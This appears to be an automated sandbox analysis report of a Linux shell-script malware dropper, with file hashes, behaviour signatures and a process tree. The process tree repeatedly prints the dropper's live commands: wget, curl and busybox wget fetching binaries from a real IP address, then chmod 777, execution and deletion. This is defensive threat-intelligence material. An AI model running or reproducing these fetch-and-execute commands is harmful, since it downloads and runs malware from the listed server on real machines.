Analysis
-
max time kernel
31s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh
-
Size
10KB
-
MD5
3aaf11d0f07a6e2ac3ecd444e17b7264
-
SHA1
20aa3c7e07680e3c4c69d8f73bb7b0c6907720dd
-
SHA256
e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea
-
SHA512
d017e3552474bf26ac8e1ee45c9b4122fa7943f4d4e234071da4a28d2a874653c9d1461ffc5152af8c0d3e923f8074ed0f8b165d934f68c4eb7df0dd2e45a65e
-
SSDEEP
192:VLV2KcsxV/G+N6GA5uKgqcl2KcixVTG+N6GQM:NV2Kcz5uKgqM2Kc3M
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1603 chmod 1663 chmod 1549 chmod 1555 chmod 1591 chmod 1597 chmod 1657 chmod 1677 chmod 1683 chmod 1567 chmod 1585 chmod 1609 chmod 1633 chmod 1579 chmod 1639 chmod 1519 chmod 1525 chmod 1537 chmod 1543 chmod 1573 chmod 1651 chmod 1531 chmod 1561 chmod 1615 chmod 1621 chmod 1627 chmod 1645 chmod 1669 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 1520 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 1526 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 1532 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 1538 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 1544 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 1550 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 1556 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 1562 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 1568 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 1574 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 1580 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 1586 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 1592 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 1598 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 1604 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 1610 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 1616 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 1622 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 1628 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 1634 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 1640 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 1646 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 1652 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 1658 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 1664 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 1670 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 1678 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 1684 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl
Processes
-
/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh/tmp/e8839f088ca46e687cf3ac5565b8bfd0b133c6df3caaaf643fcedf2bf2999eea.sh1⤵PID:1511
-
/bin/rm/bin/rm bins.sh2⤵PID:1512
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1518
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1524
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1530
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1536
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1542
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1548
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1554
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1560
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1566
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1572
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1578
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1584
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1590
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1596
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1602
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1608
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1614
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1620
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1626
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1632
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1638
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1644
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1650
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:1653
-
-
